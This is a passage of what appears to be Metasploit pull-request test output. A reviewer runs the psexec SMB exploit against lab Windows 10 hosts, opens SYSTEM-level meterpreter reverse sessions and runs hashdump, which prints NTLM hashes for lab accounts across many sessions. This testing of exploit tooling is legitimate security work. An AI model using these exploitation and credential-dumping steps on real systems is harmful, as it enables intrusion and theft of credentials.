kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 8 (10.5.134.148) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 9 (10.5.134.162) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 10 (10.5.134.167) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:eaa652f45490d2779b30aa0aeb8808eb::: [*] Running 'hashdump' on meterpreter session 11 (10.5.134.189) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3cef7d00bbd9a772e0f835d1b09a6729::: [*] Running 'hashdump' on meterpreter session 12 (10.5.134.193) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:82d0d4232034a07f71390e3324f2fb39::: [*] Running 'hashdump' on meterpreter session 13 (10.5.134.199) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8fd113c3c361b34c776a63da8819595a::: msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 4 (10.5.134.109) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 5 (10.5.134.117) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 6 (10.5.134.133) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 7 (10.5.134.144) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 8 (10.5.134.148) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 9 (10.5.134.162) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 10 (10.5.134.167) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 11 (10.5.134.189) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 12 (10.5.134.193) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 13 (10.5.134.199) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > ```

bwatters-r7 commented 10 months ago

:green_circle: Windows 10x64 WOW64

``` msf6 exploit(windows/smb/psexec) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 15 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X64_1703 10.5.135.201:4444 -> 10.5.134.111:49787 (10.5.134.111) 16 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X64_1803 10.5.135.201:4444 -> 10.5.134.132:49767 (10.5.134.132) 17 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X64_1511 10.5.135.201:4444 -> 10.5.134.145:49744 (10.5.134.145) 18 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X64 10.5.135.201:4444 -> 10.5.134.149:49488 (10.5.134.149) 19 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X64_1709 10.5.135.201:4444 -> 10.5.134.150:49781 (10.5.134.150) 20 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X64_20H2 10.5.135.201:4444 -> 10.5.134.151:49731 (10.5.134.151) 21 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X64_2004 10.5.135.201:4444 -> 10.5.134.157:49722 (10.5.134.157) 22 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X64_1607 10.5.135.201:4444 -> 10.5.134.171:49759 (10.5.134.171) 23 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X64_21H1 10.5.135.201:4444 -> 10.5.134.192:49809 (10.5.134.192) msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 15 (10.5.134.111) Computer : WIN10X64_1703 OS : Windows 10 (10.0 Build 15063). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 16 (10.5.134.132) Computer : WIN10X64_1803 OS : Windows 10 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 17 (10.5.134.145) Computer : WIN10X64_1511 OS : Windows 10 (10.0 Build 10586). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 18 (10.5.134.149) Computer : WIN10X64 OS : Windows 10 (10.0 Build 10240). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 19 (10.5.134.150) Computer : WIN10X64_1709 OS : Windows 10 (10.0 Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 20 (10.5.134.151) Computer : WIN10X64_20H2 OS : Windows 10 (10.0 Build 19042). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 21 (10.5.134.157) Computer : WIN10X64_2004 OS : Windows 10 (10.0 Build 19041). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 22 (10.5.134.171) Computer : WIN10X64_1607 OS : Windows 10 (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 23 (10.5.134.192) Computer : WIN10X64_21H1 OS : Windows 10 (10.0 Build 19043). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 15 (10.5.134.111) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 16 (10.5.134.132) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 17 (10.5.134.145) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 18 (10.5.134.149) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 19 (10.5.134.150) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 20 (10.5.134.151) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 21 (10.5.134.157) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 22 (10.5.134.171) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 23 (10.5.134.192) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 15 (10.5.134.111) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 16 (10.5.134.132) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d8384ae77d76137afd52d904f6e23a56::: [*] Running 'hashdump' on meterpreter session 17 (10.5.134.145) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 18 (10.5.134.149) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: 